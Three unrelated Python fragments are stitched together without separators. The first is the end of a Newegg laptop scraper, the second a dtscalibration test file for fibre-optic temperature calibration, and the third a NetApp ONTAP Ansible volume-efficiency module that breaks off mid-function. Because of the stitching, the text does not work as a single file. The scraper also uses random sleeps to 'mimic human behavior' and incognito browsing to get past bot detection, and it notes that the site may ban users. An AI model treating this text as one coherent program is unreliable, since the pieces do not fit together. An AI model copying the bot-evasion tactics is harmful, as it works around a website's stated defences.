browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').mouse_over()
time.sleep(4)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').click()
print('Tails - 1st Bottom Xpath - SUCCESSFUL "Next Page" Bottom Button. \n')
except:
print("EXCEPTION - 1st Bottom Xpath Failed. Sleep for 4 second then will try with 2nd Xpath bottom link. \n")
try:
time.sleep(4)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[3]/div/div/div[11]/button').mouse_over()
time.sleep(4)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[3]/div/div/div[11]/button').click()
print('EXCEPTION BYPASSED! Tails - 2nd Bottom Xpath - SUCCESSFUL "Next Page" Bottom Button. \n')
except:
print("EXCEPTION - 2nd Bottom Xpath Failed. Trying with 3rd Xpath bottom link. \n")
try:
time.sleep(4)
browser.find_by_xpath('/html/body/div[5]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').mouse_over()
time.sleep(4)
browser.find_by_xpath('/html/body/div[5]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').click()
print('EXCEPTION BYPASSED! Tails - 3rd Bottom Xpath - SUCCESSFUL "Next Page" Bottom Button. \n')
except:
print("Last Bottom Next Page Xpath Button was unsuccessful... Will Attempt Top Next Page Button.... \n")
try:
x = random.randint(3, 8)
print(f"Mimic human behavior by randomly sleeping for {x}. \n")
rdm_slp_3_8(x)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[1]/div[2]/div/div[2]/button').mouse_over()
time.sleep(1)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[1]/div[2]/div/div[2]/button').click()
next_page_button_results.append(coin_toss_top_bottom)
print('EXCEPTION BYPASSED SUCCESSFUL "Next Page" Top Button worked. \n')
return
except:
print("EXCEPTION BYPASSES UNSUCCESSFUL - All 3 Xpath Bottom Button AND Top Next Page Xpath Button was not working due to JavaScipt Exceptions... \n")
playsound('./sounds/break_pedal.wav')
break_pedal_xptb = input("Break Pedal - Please manually click the next page button. Then enter in any key and press enter to continue the scrape. \n ")
return
# In[13]:
"""
This class takes in the dictionary from the webscraper function, and will be used in a list comprehension
to produce class "objects"
"""
class Laptops:
counter = 0
def __init__(self, **entries):
self.__dict__.update(entries)
def count(self):
print(f"Total Laptops scraped: {Laptops.counter}")
"""
Originally modeled out parent/child inheritance object structure.
After careful research, I found it much easier to export the Pandas Dataframe of the results to a dictionary,
and then into a class object.
"""
# class Product_catalog:
# all_prod_count = 0
# def __init__(self, general_category): # computer systems
# self.general_category = general_category
# Product_catalog.all_prod_count += 1
# def count_prod(self):
# return int(self.all_prod_count)
# #return '{}'.format(self.general_category)
# Sub_category was later changed to Laptops due to the scope of this project.
# class Sub_category(Product_catalog): # laptops/notebooks, gaming
# sub_category_ct = 0
# def __init__(self, general_category, sub_categ, item_num, brand, price, img_link, prod_link, model_specifications, current_promotions):
# super().__init__(general_category)
# Sub_category.sub_category_ct += 1
# self.sub_categ = sub_categ
# self.item_num = item_num
# self.brand = brand
# self.price = price
# self.img_link = img_link
# self.prod_link = prod_link
# self.model_specifications = model_specifications
# self.current_promotions = current_promotions
# ## Main Program Logic
# ---
# In[14]:
""" Welcome to the program message!
"""
print("=== NewEgg.Com Laptop - Supervised Web Crawler & Scraper Beta v1.0 ===")
print("=="*30)
print('Scope: This project is a beta and is only built to scrape the laptop section of NewEgg.com due to limited time. \n')
print("Instructions: \n")
return_dt()
print(f'Current Date And Time: {current_date} \n')
print("(1) Go to www.newegg.com, go to the laptop section, select your requirements (e.g. brand, screensize, and specifications - SSD size, processor brand and etc...) ")
print("(2) Copy and paste the url from your exact search when prompted ")
print('(3) This is a "Supervised Scraper", meaning it will mostly be automated, but you will be alerted to take action when necessary. ')
print('(4) You may run the program in the background after the initial set of instructions, as the program will alert you to take action (e.g. when Newegg suspects a bot).')
print('(5) After the webscraping is successful, you will have an option to concatenate all of the pages you scraped together into one csv file')
print('(6) Lastly, you will have an option to clear out the processing folder (data scraped by each page)')
print('(7) If you have any issues or errors, "PRESS CTRL + C" to quit the program in the terminal ')
print('Disclaimer: Newegg may ban you for 24 - 48 hours for webscraping their data, then you may resume. \n Also, please consider executing during the day, when there is plenty of web traffic to their site in your respective area. \n')
print('Happy Scraping!')
# Set up Splinter requirements.
executable_path = {'executable_path': './chromedriver.exe'}
# Ask user to input in the laptop query link they would like to scrape.
url = input("Please copy and paste your laptop query that you want to webscrape, and press enter: \n")
browser = Browser('chrome', **executable_path, headless=False, incognito=True)
browser.visit(url)
# Allocating loading time.
time.sleep(3)
break_pedal_1 = input("Break Pedal - close any pop ups and go any item and add one to the cart and go to the first search query. ")
current_url = browser.url
response = requests.get(current_url)
print(f"{response} \n")
target_page_soup = soup(response.text, 'html.parser')
# Run the results_pages function to gather the total pages to be scraped.
results_pages(target_page_soup)
"""
This is the loop that performs the page by page scraping of data / results
of the user's query.
"""
# List set up for where class Laptop objects will be stored.
print("Beginning webscraping and activity log below... ")
print("="*60)
product_catalog = []
for turn_page in range(1, total_results_pages+1):
"""
If "reCAPTCHA" pops up, pause the program using an input. This allows the user to continue
to scrape after they're done completing the quiz by inputting any value.
"""
# Allocating loading time.
time.sleep(3)
# Check if the site believes we are a bot, if so alert the user to take action.
g_recaptcha_check()
print(f"Beginning mouse over activity... \n")
# Set up "containers" to be passed into main scraping function.
if turn_page == 1:
containers = target_page_soup.find_all("div", class_="item-container")
# Added this and moved it here to test new setup.
newegg_page_scraper(containers, turn_page)
else:
web_Scraper_part2()
print("Creating laptop objects for this page... \n")
# Create instances of class objects of the laptops/notebooks using a list comprehension.
objects = [Laptops(**prod_obj) for prod_obj in scraped_dict]
print(f"Finished creating Laptop | |
# Repository: BSchilperoort/python-dts-calibration
# coding=utf-8
import os
import numpy as np
import scipy.sparse as sp
from scipy import stats
from dtscalibration import DataStore
from dtscalibration import read_xml_dir
from dtscalibration.calibrate_utils import wls_sparse
from dtscalibration.calibrate_utils import wls_stats
from dtscalibration.cli import main
np.random.seed(0)
fn = ["channel 1_20170921112245510.xml",
"channel 1_20170921112746818.xml",
"channel 1_20170921112746818.xml"]
fn_single = ["channel 2_20180504132202074.xml",
"channel 2_20180504132232903.xml",
"channel 2_20180504132303723.xml"]
if 1:
# working dir is tests
wd = os.path.dirname(os.path.abspath(__file__))
data_dir_single_ended = os.path.join(wd, 'data', 'single_ended')
data_dir_double_ended = os.path.join(wd, 'data', 'double_ended')
data_dir_double_ended2 = os.path.join(wd, 'data', 'double_ended2')
else:
# working dir is src
data_dir_single_ended = os.path.join('..', '..', 'tests', 'data', 'single_ended')
data_dir_double_ended = os.path.join('..', '..', 'tests', 'data', 'double_ended')
data_dir_double_ended2 = os.path.join('..', '..', 'tests', 'data', 'double_ended2')
def test_main():
assert main([]) == 0
def test_double_ended_variance_estimate_synthetic():
import dask.array as da
from dtscalibration import DataStore
import numpy as np
from scipy import stats
np.random.seed(0)
state = da.random.RandomState(0)
# from dtscalibration.calibrate_utils import
stokes_m_var = 40.
cable_len = 100.
nt = 500
time = np.arange(nt)
x = np.linspace(0., cable_len, 100)
ts_cold = np.ones(nt) * 4.
ts_warm = np.ones(nt) * 20.
C_p = 15246
C_m = 2400.
dalpha_r = 0.0005284
dalpha_m = 0.0004961
dalpha_p = 0.0005607
gamma = 482.6
cold_mask = x < 0.5 * cable_len
warm_mask = np.invert(cold_mask) # == False
temp_real = np.ones((len(x), nt))
temp_real[cold_mask] *= ts_cold + 273.15
temp_real[warm_mask] *= ts_warm + 273.15
st = C_p * np.exp(-dalpha_r * x[:, None]) * np.exp(-dalpha_p * x[:, None]) * np.exp(
-gamma / temp_real) / (1 - np.exp(-gamma / temp_real))
ast = C_m * np.exp(-dalpha_r * x[:, None]) * np.exp(-dalpha_m * x[:, None]) / (
1 - np.exp(-gamma / temp_real))
rst = C_p * np.exp(-dalpha_r * (-x[:, None] + 100)) * np.exp(
-dalpha_p * (-x[:, None] + 100)) * np.exp(-gamma / temp_real) / (
1 - np.exp(-gamma / temp_real))
rast = C_m * np.exp(-dalpha_r * (-x[:, None] + 100)) * np.exp(
-dalpha_m * (-x[:, None] + 100)) / (1 - np.exp(-gamma / temp_real))
st_m = st + stats.norm.rvs(size=st.shape, scale=stokes_m_var ** 0.5)
ast_m = ast + stats.norm.rvs(size=ast.shape, scale=1.1 * stokes_m_var ** 0.5)
rst_m = rst + stats.norm.rvs(size=rst.shape, scale=0.9 * stokes_m_var ** 0.5)
rast_m = rast + stats.norm.rvs(size=rast.shape, scale=0.8 * stokes_m_var ** 0.5)
print('alphaint', cable_len * (dalpha_p - dalpha_m))
print('alpha', dalpha_p - dalpha_m)
print('C', np.log(C_p / C_m))
print('x0', x.max())
ds = DataStore({
'st': (['x', 'time'], st),
'ast': (['x', 'time'], ast),
'rst': (['x', 'time'], rst),
'rast': (['x', 'time'], rast),
'mst': (['x', 'time'], st_m),
'mast': (['x', 'time'], ast_m),
'mrst': (['x', 'time'], rst_m),
'mrast': (['x', 'time'], rast_m),
'userAcquisitionTimeFW': (['time'], np.ones(nt)),
'userAcquisitionTimeBW': (['time'], np.ones(nt)),
'cold': (['time'], ts_cold),
'warm': (['time'], ts_warm)
},
coords={
'x': x,
'time': time},
attrs={
'customData:isDoubleEnded': '1'})
sections = {
'cold': [slice(0., 0.5 * cable_len)],
'warm': [slice(0.5 * cable_len, cable_len)]}
mst_var, _ = ds.variance_stokes(st_label='mst',
sections=sections,
suppress_info=True)
mast_var, _ = ds.variance_stokes(st_label='mast',
sections=sections,
suppress_info=True)
mrst_var, _ = ds.variance_stokes(st_label='mrst',
sections=sections,
suppress_info=True)
mrast_var, _ = ds.variance_stokes(st_label='mrast',
sections=sections,
suppress_info=True)
st_label = 'mst'
ast_label = 'mast'
rst_label = 'mrst'
rast_label = 'mrast'
# MC variance
ds.calibration_double_ended(sections=sections,
st_label=st_label,
ast_label=ast_label,
rst_label=rst_label,
rast_label=rast_label,
st_var=mst_var,
ast_var=mast_var,
rst_var=mrst_var,
rast_var=mrast_var,
method='wls',
# conf_ints=[0.00135, 0.025, 0.15865, 0.5, 0.84135, 0.975, 0.99865],
conf_ints=[0.025, 0.5, 0.975],
ci_avg_time_flag=0,
store_tempvar='_var',
conf_ints_size=500,
solver='sparse',
da_random_state=state)
# Calibrated variance
stdsf1 = ds.ufunc_per_section(label='TMPF',
func=np.std,
temp_err=True,
calc_per='stretch')
stdsb1 = ds.ufunc_per_section(label='TMPB',
func=np.std,
temp_err=True,
calc_per='stretch')
# Use a single timestep to better check if the parameter uncertainties propagate
ds1 = ds.isel(time=1)
# Estimated VAR
stdsf2 = ds1.ufunc_per_section(label='TMPF_MC_var',
func=np.mean,
temp_err=False,
calc_per='stretch')
stdsb2 = ds1.ufunc_per_section(label='TMPB_MC_var',
func=np.mean,
temp_err=False,
calc_per='stretch')
for (_, v1), (_, v2) in zip(stdsf1.items(), stdsf2.items()):
for v1i, v2i in zip(v1, v2):
print('Real VAR: ', v1i ** 2, 'Estimated VAR: ', v2i)
np.testing.assert_almost_equal(v1i ** 2, v2i, decimal=2)
for (_, v1), (_, v2) in zip(stdsb1.items(), stdsb2.items()):
for v1i, v2i in zip(v1, v2):
print('Real VAR: ', v1i ** 2, 'Estimated VAR: ', v2i)
np.testing.assert_almost_equal(v1i ** 2, v2i, decimal=2)
pass
def test_single_ended_variance_estimate_synthetic():
import dask.array as da
from dtscalibration import DataStore
import numpy as np
from scipy import stats
np.random.seed(0)
state = da.random.RandomState(0)
stokes_m_var = 40.
astokes_m_var = 60.
cable_len = 100.
nt = 50
time = np.arange(nt)
x = np.linspace(0., cable_len, 500)
ts_cold = np.ones(nt) * 4.
ts_warm = np.ones(nt) * 20.
C_p = 15246
C_m = 2400.
dalpha_r = 0.0005284
dalpha_m = 0.0004961
dalpha_p = 0.0005607
gamma = 482.6
cold_mask = x < 0.5 * cable_len
warm_mask = np.invert(cold_mask) # == False
temp_real = np.ones((len(x), nt))
temp_real[cold_mask] *= ts_cold + 273.15
temp_real[warm_mask] *= ts_warm + 273.15
st = C_p * np.exp(-dalpha_r * x[:, None]) * np.exp(-dalpha_p * x[:, None]) * np.exp(
-gamma / temp_real) / (1 - np.exp(-gamma / temp_real))
ast = C_m * np.exp(-dalpha_r * x[:, None]) * np.exp(-dalpha_m * x[:, None]) / (
1 - np.exp(-gamma / temp_real))
st_m = st + stats.norm.rvs(size=st.shape, scale=stokes_m_var ** 0.5)
ast_m = ast + stats.norm.rvs(size=ast.shape, scale=astokes_m_var ** 0.5)
print('alphaint', cable_len * (dalpha_p - dalpha_m))
print('alpha', dalpha_p - dalpha_m)
print('C', np.log(C_p / C_m))
print('x0', x.max())
ds = DataStore({
'st': (['x', 'time'], st),
'ast': (['x', 'time'], ast),
'mst': (['x', 'time'], st_m),
'mast': (['x', 'time'], ast_m),
'userAcquisitionTimeFW': (['time'], np.ones(nt)),
'cold': (['time'], ts_cold),
'warm': (['time'], ts_warm)
},
coords={
'x': x,
'time': time},
attrs={
'customData:isDoubleEnded': '0'})
sections = {
'cold': [slice(0., 0.5 * cable_len)],
'warm': [slice(0.5 * cable_len, cable_len)]}
st_label = 'mst'
ast_label = 'mast'
mst_var, _ = ds.variance_stokes(st_label=st_label,
sections=sections,
suppress_info=True)
mast_var, _ = ds.variance_stokes(st_label=ast_label,
sections=sections,
suppress_info=True)
# MC variance
ds.calibration_single_ended(sections=sections,
st_label=st_label,
ast_label=ast_label,
st_var=mst_var,
ast_var=mast_var,
method='wls',
# conf_ints=[0.00135, 0.025, 0.15865, 0.5, 0.84135, 0.975, 0.99865],
conf_ints=[0.025, 0.5, 0.975],
ci_avg_time_flag=0,
store_tempvar='_var',
conf_ints_size=500,
solver='sparse',
da_random_state=state)
# Calibrated variance
stdsf1 = ds.ufunc_per_section(label='TMPF',
func=np.std,
temp_err=True,
calc_per='stretch',
ddof=1)
# Use a single timestep to better check if the parameter uncertainties propagate
ds1 = ds.isel(time=1)
# Estimated VAR
stdsf2 = ds1.ufunc_per_section(label='TMPF_MC_var',
func=np.mean,
temp_err=False,
calc_per='stretch')
for (_, v1), (_, v2) in zip(stdsf1.items(), stdsf2.items()):
for v1i, v2i in zip(v1, v2):
print('Real VAR: ', v1i ** 2, 'Estimated VAR: ', v2i)
np.testing.assert_almost_equal(v1i ** 2, v2i, decimal=2)
pass
def test_variance_of_stokes():
correct_var = 40.16
filepath = data_dir_double_ended2
ds = read_xml_dir(filepath,
timezone_netcdf='UTC',
timezone_ultima_xml='Europe/Amsterdam',
file_ext='*.xml')
sections = {
'probe1Temperature': [slice(7.5, 17.), slice(70., 80.)], # cold bath
'probe2Temperature': [slice(24., 34.), slice(85., 95.)], # warm bath
}
I_var, _ = ds.variance_stokes(st_label='ST',
sections=sections,
use_statsmodels=True)
np.testing.assert_almost_equal(I_var, correct_var, decimal=1)
I_var, _ = ds.variance_stokes(st_label='ST',
sections=sections,
use_statsmodels=False)
np.testing.assert_almost_equal(I_var, correct_var, decimal=1)
ds_dask = ds.chunk(chunks={})
I_var, _ = ds_dask.variance_stokes(
st_label='ST',
sections=sections,
use_statsmodels=False)
np.testing.assert_almost_equal(I_var, correct_var, decimal=1)
pass
def test_variance_of_stokes_synthetic():
"""
Produces a synthetic Stokes measurement with a known noise distribution. Check if same
variance is obtained.
Returns
-------
"""
yvar = 5.
nx = 50
x = np.linspace(0., 20., nx)
nt = 1000
beta = np.linspace(3000, 4000, nt)[None]
y = beta * np.exp(-0.001 * x[:, None])
y += stats.norm.rvs(size=y.size,
scale=yvar ** 0.5).reshape(y.shape)
ds = DataStore({
'test_ST': (['x', 'time'], y),
'probe1Temperature': (['time'], range(nt)),
'userAcquisitionTimeFW': (['time'], np.ones(nt)),
},
coords={
'x': x,
'time': range(nt)},
attrs={'customData:isDoubleEnded': '0'})
sections = {'probe1Temperature': [slice(0., 20.), ]}
test_ST_var, _ = ds.variance_stokes(st_label='test_ST',
sections=sections,
suppress_info=True)
np.testing.assert_almost_equal(test_ST_var, yvar,
decimal=1)
def test_calibration_ols():
"""Testing ordinary least squares procedure. And compare with device calibrated temperature.
The measurements were calibrated by the device using only section 8--17.m. Those temperatures
are compared up to 2 decimals. Silixa only uses a single calibration constant (I think they
fix gamma).
"""
filepath = data_dir_double_ended2
ds = read_xml_dir(filepath,
timezone_netcdf='UTC',
timezone_ultima_xml='Europe/Amsterdam',
file_ext='*.xml')
ds100 = ds.sel(x=slice(0, 100))
sections_ultima = {
'probe1Temperature': [slice(8., 17.)], # cold bath
}
st_label = 'ST'
ast_label = 'AST'
rst_label = 'REV-ST'
rast_label = 'REV-AST'
ds100.calibration_double_ended(sections=sections_ultima,
st_label=st_label,
ast_label=ast_label,
rst_label=rst_label,
rast_label=rast_label,
method='ols')
ds100['TMPAVG'] = (ds100.TMPF + ds100.TMPB) / 2
np.testing.assert_array_almost_equal(ds100.TMPAVG.data,
ds100.TMP.data,
decimal=1)
ds009 = ds100.sel(x=sections_ultima['probe1Temperature'][0])
np.testing.assert_array_almost_equal(ds009.TMPAVG.data,
ds009.TMP.data,
decimal=2)
pass
def test_calibrate_wls_procedures():
x = np.linspace(0, 10, 25 * 4)
np.random.shuffle(x)
X = x.reshape((25, 4))
beta = np.array([1, 0.1, 10, 5])
beta_w = np.concatenate((np.ones(10), np.ones(15) * 1.0))
beta_0 = np.array([1, 1, 1, 1])
y = np.dot(X, beta)
y_meas = y + np.random.normal(size=y.size)
# first check unweighted convergence
beta_numpy = np.linalg.lstsq(X, y, rcond=None)[0]
np.testing.assert_array_almost_equal(beta, beta_numpy, decimal=8)
ps_sol, ps_var = wls_stats(X, y, w=1, calc_cov=0)
p_sol, p_var = wls_sparse(X, y, w=1, calc_cov=0, x0=beta_0)
np.testing.assert_array_almost_equal(beta, ps_sol, decimal=8)
np.testing.assert_array_almost_equal(beta, p_sol, decimal=8)
# now with weights
dec = 8
ps_sol, ps_var, ps_cov = wls_stats(X, y_meas, w=beta_w, calc_cov=True)
p_sol, p_var, p_cov = wls_sparse(X, y_meas, w=beta_w, calc_cov=True, x0=beta_0)
np.testing.assert_array_almost_equal(p_sol, ps_sol, decimal=dec)
np.testing.assert_array_almost_equal(p_var, ps_var, decimal=dec)
np.testing.assert_array_almost_equal(p_cov, ps_cov, decimal=dec)
# Test array
#!/usr/bin/python
# (c) 2021, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: na_ontap_volume_efficiency
short_description: NetApp ONTAP enables, disables or modifies volume efficiency
extends_documentation_fragment:
- netapp.ontap.netapp.na_ontap
version_added: '21.2.0'
author: NetApp Ansible Team (@carchi8py) <<EMAIL>>
description:
- Enable, modify or disable volume efficiency
options:
state:
description:
- Whether the specified volume efficiency should be enabled or not.
choices: ['present', 'absent']
default: present
type: str
vserver:
description:
- Specifies the vserver for the volume.
required: true
type: str
path:
description:
- Specifies the path for the volume.
required: true
type: str
schedule:
description:
- Specifies the storage efficiency schedule.
type: str
policy:
description:
- Specifies the storage efficiency policy to use, only supported on AFF systems.
choices: ['auto', 'default', 'inline-only', '-']
type: str
enable_compression:
description:
- Specifies if compression is to be enabled.
type: bool
enable_inline_compression:
description:
- Specifies if in-line compression is to be enabled.
type: bool
enable_inline_dedupe:
description:
- Specifies if in-line deduplication is to be enabled, only supported on AFF systems or hybrid aggregates.
type: bool
enable_data_compaction:
description:
- Specifies if compaction is to be enabled.
type: bool
enable_cross_volume_inline_dedupe:
description:
- Specifies if in-line cross volume inline deduplication is to be enabled, this can only be enabled when inline deduplication is enabled.
type: bool
enable_cross_volume_background_dedupe:
description:
- Specifies if cross volume background deduplication is to be enabled, this can only be enabled when inline deduplication is enabled.
type: bool
volume_efficiency:
description:
- Start or Stop a volume efficiency operation on a given volume path.
choices: ['start', 'stop']
version_added: '21.4.0'
type: str
start_ve_scan_all:
description:
- Specifies the scanner to scan the entire volume without applying shared block optimization.
version_added: '21.4.0'
type: bool
start_ve_build_metadata:
description:
- Specifies the scanner to scan the entire volume and generate a fingerprint database without attempting the sharing.
version_added: '21.4.0'
type: bool
start_ve_delete_checkpoint:
description:
- Specifies the scanner to delete the existing checkpoint and start the operation from the beginning.
version_added: '21.4.0'
type: bool
start_ve_queue_operation:
description:
- Specifies the operation to queue if an existing operation is already running on the volume and in the fingerprint verification phase.
version_added: '21.4.0'
type: bool
start_ve_scan_old_data:
description:
- Specifies the operation to scan the file system to process all the existing data.
version_added: '21.4.0'
type: bool
start_ve_qos_policy:
description:
- Specifies the QoS policy for the operation.
choices: ['background', 'best-effort']
default: best-effort
version_added: '21.4.0'
type: str
stop_ve_all_operations:
description:
- Specifies that all running and queued operations to be stopped.
version_added: '21.4.0'
type: bool
storage_efficiency_mode:
description:
- Storage efficiency mode used by volume. This parameter is only supported on AFF platforms.
- Requires ONTAP 9.10.1 or later.
choices: ['default', 'efficient']
type: str
version_added: '21.14.0'
"""
EXAMPLES = """
- name: Enable Volume efficiency
na_ontap_volume_efficiency:
state: present
vserver: "TESTSVM"
path: "/vol/test_sis"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
- name: Disable Volume efficiency test
na_ontap_volume_efficiency:
state: absent
vserver: "TESTSVM"
path: "/vol/test_sis"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
- name: Modify storage efficiency policy
na_ontap_volume_efficiency:
state: present
vserver: "TESTSVM"
path: "/vol/test_sis"
schedule: "mon-sun@0,1,23"
enable_compression: "True"
enable_inline_compression: "True"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
- name: Start volume efficiency
na_ontap_volume_efficiency:
state: present
vserver: "TESTSVM"
volume_efficiency: "start"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
- name: Stop volume efficiency
na_ontap_volume_efficiency:
state: present
vserver: "TESTSVM"
volume_efficiency: "stop"
hostname: "{{ hostname }}"
username: "{{ username }}"
password: "{{ password }}"
https: true
validate_certs: false
"""
RETURN = """
"""
import copy
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible_collections.netapp.ontap.plugins.module_utils.netapp as netapp_utils
from ansible_collections.netapp.ontap.plugins.module_utils.netapp_module import NetAppModule
from ansible_collections.netapp.ontap.plugins.module_utils.netapp import OntapRestAPI
import ansible_collections.netapp.ontap.plugins.module_utils.rest_response_helpers as rrh
HAS_NETAPP_LIB = netapp_utils.has_netapp_lib()
class NetAppOntapVolumeEfficiency(object):
"""
Creates, Modifies and Disables a Volume Efficiency
"""
def __init__(self):
"""
Initialize the ONTAP Volume Efficiency class
"""
self.argument_spec = netapp_utils.na_ontap_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=False, choices=['present', 'absent'], default='present'),
vserver=dict(required=True, type='str'),
path=dict(required=True, type='str'),
schedule=dict(required=False, type='str'),
policy=dict(required=False, choices=['auto', 'default', 'inline-only', '-'], type='str'),
enable_inline_compression=dict(required=False, type='bool'),
enable_compression=dict(required=False, type='bool'),
enable_inline_dedupe=dict(required=False, type='bool'),
enable_data_compaction=dict(required=False, type='bool'),
enable_cross_volume_inline_dedupe=dict(required=False, type='bool'),
enable_cross_volume_background_dedupe=dict(required=False, type='bool'),
storage_efficiency_mode=dict(required=False, choices=['default', 'efficient'], type='str'),
volume_efficiency=dict(required=False, choices=['start', 'stop'], type='str'),
start_ve_scan_all=dict(required=False, type='bool'),
start_ve_build_metadata=dict(required=False, type='bool'),
start_ve_delete_checkpoint=dict(required=False, type='bool'),
start_ve_queue_operation=dict(required=False, type='bool'),
start_ve_scan_old_data=dict(required=False, type='bool'),
start_ve_qos_policy=dict(required=False, choices=['background', 'best-effort'], type='str', default='best-effort'),
stop_ve_all_operations=dict(required=False, type='bool')
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True,
required_if=[('start_ve_scan_all', True, ['start_ve_scan_old_data'])],
mutually_exclusive=[('policy', 'schedule')]
)
# set up variables
self.na_helper = NetAppModule()
self.parameters = self.na_helper.set_parameters(self.module.params)
if self.parameters['state'] == 'present':
self.parameters['enabled'] = 'enabled'
else:
self.parameters['enabled'] = 'disabled'
if 'volume_efficiency' in self.parameters:
if self.parameters['volume_efficiency'] == 'start':
self.parameters['status'] = 'running'
else:
self.parameters['status'] = 'idle'
self.rest_api = OntapRestAPI(self.module)
self.use_rest = self.rest_api.is_rest()
if not self.use_rest:
if HAS_NETAPP_LIB is False:
self.module.fail_json(msg="the python NetApp-Lib module is required")
else:
self.server = netapp_utils.setup_na_ontap_zapi(module=self.module, vserver=self.parameters['vserver'])
if self.parameters.get('storage_efficiency_mode') is not None:
self.rest_api.fail_if_not_rest_minimum_version('option storage_efficiency_mode', 9, 10, 1)
def get_volume_efficiency(self):
"""
        Get the storage efficiency settings for a given path.
        :return: dict of sis details if they exist, None otherwise
"""
return_value = None
if self.use_rest:
api = 'private/cli/volume/efficiency'
query = {
'fields': 'path,volume,state,op_status,schedule,compression,inline_compression,inline_dedupe,policy,data_compaction,'
'cross_volume_inline_dedupe,cross_volume_background_dedupe',
'path': self.parameters['path'],
'vserver': self.parameters['vserver']
}
if self.parameters.get('storage_efficiency_mode') is not None:
query['fields'] += ',storage_efficiency_mode'
message, error = self.rest_api.get(api, query)
record, error = rrh.check_for_0_or_1_records(api, message, error)
if error:
self.module.fail_json(msg=error)
if record is None:
return None
return_value = {
'path': record['path'],
'enabled': record['state'],
'status': record['op_status'],
'schedule': record['schedule'],
'enable_inline_compression': record['inline_compression'],
'enable_compression': record['compression'],
'enable_inline_dedupe': record['inline_dedupe'],
'enable_data_compaction': record['data_compaction'],
'enable_cross_volume_inline_dedupe': record['cross_volume_inline_dedupe'],
'enable_cross_volume_background_dedupe': record['cross_volume_background_dedupe']
}
return_value['policy'] = record.get('policy', '-')
if self.parameters.get('storage_efficiency_mode') is not None:
                # force a value so that a change is detected - and an error is raised if the system is not AFF
return_value['storage_efficiency_mode'] = record.get('storage_efficiency_mode', '-')
return return_value
else:
sis_get_iter = netapp_utils.zapi.NaElement('sis-get-iter')
sis_status_info = netapp_utils.zapi.NaElement('sis-status-info')
sis_status_info.add_new_child('path', self.parameters['path'])
query = netapp_utils.zapi.NaElement('query')
query.add_child_elem(sis_status_info)
sis_get_iter.add_child_elem(query)
result = self.server.invoke_successfully(sis_get_iter, True)
try:
if result.get_child_by_name('attributes-list'):
sis_status_attributes = result['attributes-list']['sis-status-info']
return_value = {
'path': sis_status_attributes['path'],
'enabled': sis_status_attributes['state'],
'status': sis_status_attributes['status'],
'schedule': sis_status_attributes['schedule'],
'enable_inline_compression': self.na_helper.get_value_for_bool(
True, sis_status_attributes.get_child_content('is-inline-compression-enabled')
),
'enable_compression': self.na_helper.get_value_for_bool(True, sis_status_attributes.get_child_content('is-compression-enabled')),
'enable_inline_dedupe': self.na_helper.get_value_for_bool(True, sis_status_attributes.get_child_content('is-inline-dedupe-enabled')),
'enable_data_compaction': self.na_helper.get_value_for_bool(
True, sis_status_attributes.get_child_content('is-data-compaction-enabled')
),
'enable_cross_volume_inline_dedupe': self.na_helper.get_value_for_bool(
True, sis_status_attributes.get_child_content('is-cross-volume-inline-dedupe-enabled')
),
'enable_cross_volume_background_dedupe': self.na_helper.get_value_for_bool(
True, sis_status_attributes.get_child_content('is-cross-volume-background-dedupe-enabled')
)
}
if sis_status_attributes.get_child_by_name('policy'):
return_value['policy'] = sis_status_attributes['policy']
else:
return_value['policy'] = '-'
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error getting volume efficiency for path %s on vserver %s: %s' % (
self.parameters['path'], self.parameters['vserver'], to_native(error)), exception=traceback.format_exc()
)
return return_value
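    # Illustrative note (not part of the original module): assuming a volume that
    # already has compression enabled, the REST branch above would return a dict
    # shaped roughly like the following (values are made up for illustration):
    #
    #   {
    #       'path': '/vol/test_sis',
    #       'enabled': 'enabled',
    #       'status': 'idle',
    #       'schedule': 'sun-sat@0',
    #       'enable_compression': True,
    #       'enable_inline_compression': False,
    #       ...
    #       'policy': '-',
    #   }
    #
    # The keys mirror the fields requested in the 'fields' query string above.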
def enable_volume_efficiency(self):
"""
Enables Volume efficiency for a given volume by path
"""
if self.use_rest:
api = 'private/cli/volume/efficiency/on'
body = dict()
query = {
'path': self.parameters['path'],
'vserver': self.parameters['vserver']
}
message, error = self.rest_api.patch(api, body, query)
if error:
self.module.fail_json(msg=error)
elif message['num_records'] == 0:
error = 'Error enabling storage efficiency for path %s on vserver %s as the path provided does not exist.' % (self.parameters['path'],
self.parameters['vserver'])
self.module.fail_json(msg=error)
else:
sis_enable = netapp_utils.zapi.NaElement("sis-enable")
sis_enable.add_new_child("path", self.parameters['path'])
try:
self.server.invoke_successfully(sis_enable, True)
except netapp_utils.zapi.NaApiError as error:
self.module.fail_json(msg='Error enabling storage efficiency for path %s on vserver %s: %s' % (self.parameters['path'],
self.parameters['vserver'], to_native(error)), exception=traceback.format_exc())
def disable_volume_efficiency(self):
"""
Disables Volume efficiency for a given volume by path
"""
if self.use_rest:
api = 'private/cli/volume/efficiency/off'
body = dict()
query = {
'path': self.parameters['path'],
